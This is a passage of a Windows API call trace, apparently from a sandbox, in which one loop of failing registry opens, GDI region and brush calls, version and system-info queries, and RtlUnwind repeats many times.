ReturnValue=0x0) [0087.836] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.836] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x960401d3 [0087.836] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x940401d6 [0087.836] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c84 [0087.836] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c85 [0087.837] CombineRgn (hrgnDst=0x1040c84, hrgnSrc1=0x960401d3, hrgnSrc2=0x940401d6, iMode=1) returned 1 [0087.837] CombineRgn (hrgnDst=0x1040c85, hrgnSrc1=0x960401d3, hrgnSrc2=0x940401d6, iMode=4) returned 2 [0087.837] CreateSolidBrush (color=0xff) returned 0x2100c83 [0087.837] CreateSolidBrush (color=0xff0000) returned 0x1100c86 [0087.837] DeleteObject (ho=0x1100c86) returned 1 [0087.837] DeleteObject (ho=0x940401d6) returned 1 [0087.837] DeleteObject (ho=0x960401d3) returned 1 [0087.837] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.837] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.837] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.837] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.837] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.837] BeginPath (hdc=0x0) returned 0 [0087.837] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.837] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.837] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.837] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.837] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.837] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.837] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.837] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.837] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x950401d6 [0087.837] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x970401d3 [0087.837] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c87 [0087.837] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c88 [0087.837] CombineRgn (hrgnDst=0x1040c87, hrgnSrc1=0x950401d6, hrgnSrc2=0x970401d3, iMode=1) returned 1 [0087.837] CombineRgn (hrgnDst=0x1040c88, hrgnSrc1=0x950401d6, hrgnSrc2=0x970401d3, iMode=4) returned 2 [0087.837] CreateSolidBrush (color=0xff) returned 0x2100c86 [0087.837] CreateSolidBrush (color=0xff0000) returned 0x1100c89 [0087.837] DeleteObject (ho=0x1100c89) returned 1 [0087.837] DeleteObject (ho=0x970401d3) returned 1 [0087.837] DeleteObject (ho=0x950401d6) returned 1 [0087.837] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.837] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.837] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.837] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.837] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.837] BeginPath (hdc=0x0) returned 0 [0087.838] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.838] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.838] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.838] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.838] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x980401d3 [0087.838] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x960401d6 [0087.838] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8a [0087.838] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8b [0087.838] CombineRgn (hrgnDst=0x1040c8a, hrgnSrc1=0x980401d3, hrgnSrc2=0x960401d6, iMode=1) returned 1 [0087.838] CombineRgn (hrgnDst=0x1040c8b, hrgnSrc1=0x980401d3, hrgnSrc2=0x960401d6, iMode=4) returned 2 [0087.838] CreateSolidBrush (color=0xff) returned 0x2100c89 [0087.838] CreateSolidBrush (color=0xff0000) returned 0x1100c8c [0087.838] DeleteObject (ho=0x1100c8c) returned 1 [0087.838] DeleteObject (ho=0x960401d6) returned 1 [0087.838] DeleteObject (ho=0x980401d3) returned 1 [0087.838] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.838] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.838] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.838] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.838] BeginPath (hdc=0x0) returned 0 [0087.838] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.838] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.838] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.838] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.838] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x970401d6 [0087.839] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x990401d3 [0087.839] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8d [0087.839] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8e [0087.839] CombineRgn (hrgnDst=0x1040c8d, hrgnSrc1=0x970401d6, hrgnSrc2=0x990401d3, iMode=1) returned 1 [0087.839] CombineRgn (hrgnDst=0x1040c8e, hrgnSrc1=0x970401d6, hrgnSrc2=0x990401d3, iMode=4) returned 2 [0087.839] CreateSolidBrush (color=0xff) returned 0x2100c8c [0087.839] CreateSolidBrush (color=0xff0000) returned 0x1100c8f [0087.839] DeleteObject (ho=0x1100c8f) returned 1 [0087.839] DeleteObject (ho=0x990401d3) returned 1 [0087.839] DeleteObject (ho=0x970401d6) returned 1 [0087.839] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.839] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.839] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.839] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.839] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.839] BeginPath (hdc=0x0) returned 0 [0087.839] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.839] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.839] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.839] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.839] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.839] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.839] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.839] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.839] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a0401d3 [0087.839] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x980401d6 [0087.839] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c90 [0087.839] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c91 [0087.839] CombineRgn (hrgnDst=0x1040c90, hrgnSrc1=0x9a0401d3, hrgnSrc2=0x980401d6, iMode=1) returned 1 [0087.839] CombineRgn (hrgnDst=0x1040c91, hrgnSrc1=0x9a0401d3, hrgnSrc2=0x980401d6, iMode=4) returned 2 [0087.839] CreateSolidBrush (color=0xff) returned 0x2100c8f [0087.839] CreateSolidBrush (color=0xff0000) returned 0x1100c92 [0087.839] DeleteObject (ho=0x1100c92) returned 1 [0087.839] DeleteObject (ho=0x980401d6) returned 1 [0087.839] DeleteObject (ho=0x9a0401d3) returned 1 [0087.839] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.840] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.840] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.840] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.840] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.840] BeginPath (hdc=0x0) returned 0 [0087.840] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.840] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.840] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.840] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.840] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.840] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.840] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.840] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.840] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x990401d6 [0087.840] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b0401d3 [0087.840] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c93 [0087.840] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c94 [0087.840] CombineRgn (hrgnDst=0x1040c93, hrgnSrc1=0x990401d6, hrgnSrc2=0x9b0401d3, iMode=1) returned 1 [0087.840] CombineRgn (hrgnDst=0x1040c94, hrgnSrc1=0x990401d6, hrgnSrc2=0x9b0401d3, iMode=4) returned 2 [0087.840] CreateSolidBrush (color=0xff) returned 0x2100c92 [0087.840] CreateSolidBrush (color=0xff0000) returned 0x1100c95 [0087.840] DeleteObject (ho=0x1100c95) returned 1 [0087.840] DeleteObject (ho=0x9b0401d3) returned 1 [0087.840] DeleteObject (ho=0x990401d6) returned 1 [0087.840] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.840] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.840] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.840] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.840] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.840] BeginPath (hdc=0x0) returned 0 [0087.840] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.840] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.841] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.841] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.841] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.841] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.841] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.841] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.841] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c0401d3 [0087.841] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a0401d6 [0087.841] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c96 [0087.841] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c97 [0087.841] CombineRgn (hrgnDst=0x1040c96, hrgnSrc1=0x9c0401d3, hrgnSrc2=0x9a0401d6, iMode=1) returned 1 [0087.841] CombineRgn (hrgnDst=0x1040c97, hrgnSrc1=0x9c0401d3, hrgnSrc2=0x9a0401d6, iMode=4) returned 2 [0087.841] CreateSolidBrush (color=0xff) returned 0x2100c95 [0087.841] CreateSolidBrush (color=0xff0000) returned 0x1100c98 [0087.841] DeleteObject (ho=0x1100c98) returned 1 [0087.841] DeleteObject (ho=0x9a0401d6) returned 1 [0087.841] DeleteObject (ho=0x9c0401d3) returned 1 [0087.841] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.841] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.841] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.841] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.841] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.841] BeginPath (hdc=0x0) returned 0 [0087.841] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.841] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.841] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.841] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.841] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.841] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.841] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.841] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.842] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b0401d6 [0087.842] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d0401d3 [0087.842] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c99 [0087.842] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9a [0087.842] CombineRgn (hrgnDst=0x1040c99, hrgnSrc1=0x9b0401d6, hrgnSrc2=0x9d0401d3, iMode=1) returned 1 [0087.842] CombineRgn (hrgnDst=0x1040c9a, hrgnSrc1=0x9b0401d6, hrgnSrc2=0x9d0401d3, iMode=4) returned 2 [0087.842] CreateSolidBrush (color=0xff) returned 0x2100c98 [0087.842] CreateSolidBrush (color=0xff0000) returned 0x1100c9b [0087.842] DeleteObject (ho=0x1100c9b) returned 1 [0087.842] DeleteObject (ho=0x9d0401d3) returned 1 [0087.842] DeleteObject (ho=0x9b0401d6) returned 1 [0087.842] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.842] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.842] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.842] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.842] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.842] BeginPath (hdc=0x0) returned 0 [0087.842] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.842] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.842] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.842] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.842] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.842] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.842] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.842] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.842] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e0401d3 [0087.842] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c0401d6 [0087.842] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9c [0087.842] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9d [0087.842] CombineRgn (hrgnDst=0x1040c9c, hrgnSrc1=0x9e0401d3, hrgnSrc2=0x9c0401d6, iMode=1) returned 1 [0087.842] CombineRgn (hrgnDst=0x1040c9d, hrgnSrc1=0x9e0401d3, hrgnSrc2=0x9c0401d6, iMode=4) returned 2 [0087.842] CreateSolidBrush (color=0xff) returned 0x2100c9b [0087.842] CreateSolidBrush (color=0xff0000) returned 0x1100c9e [0087.842] DeleteObject (ho=0x1100c9e) returned 1 [0087.842] DeleteObject (ho=0x9c0401d6) returned 1 [0087.842] DeleteObject (ho=0x9e0401d3) returned 1 [0087.842] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.843] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.843] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.843] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.843] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.843] BeginPath (hdc=0x0) returned 0 [0087.843] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.843] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.843] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.843] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.843] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.843] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.843] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.843] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.843] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d0401d6 [0087.843] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f0401d3 [0087.843] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9f [0087.843] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca0 [0087.843] CombineRgn (hrgnDst=0x1040c9f, hrgnSrc1=0x9d0401d6, hrgnSrc2=0x9f0401d3, iMode=1) returned 1 [0087.843] CombineRgn (hrgnDst=0x1040ca0, hrgnSrc1=0x9d0401d6, hrgnSrc2=0x9f0401d3, iMode=4) returned 2 [0087.843] CreateSolidBrush (color=0xff) returned 0x2100c9e [0087.843] CreateSolidBrush (color=0xff0000) returned 0x1100ca1 [0087.843] DeleteObject 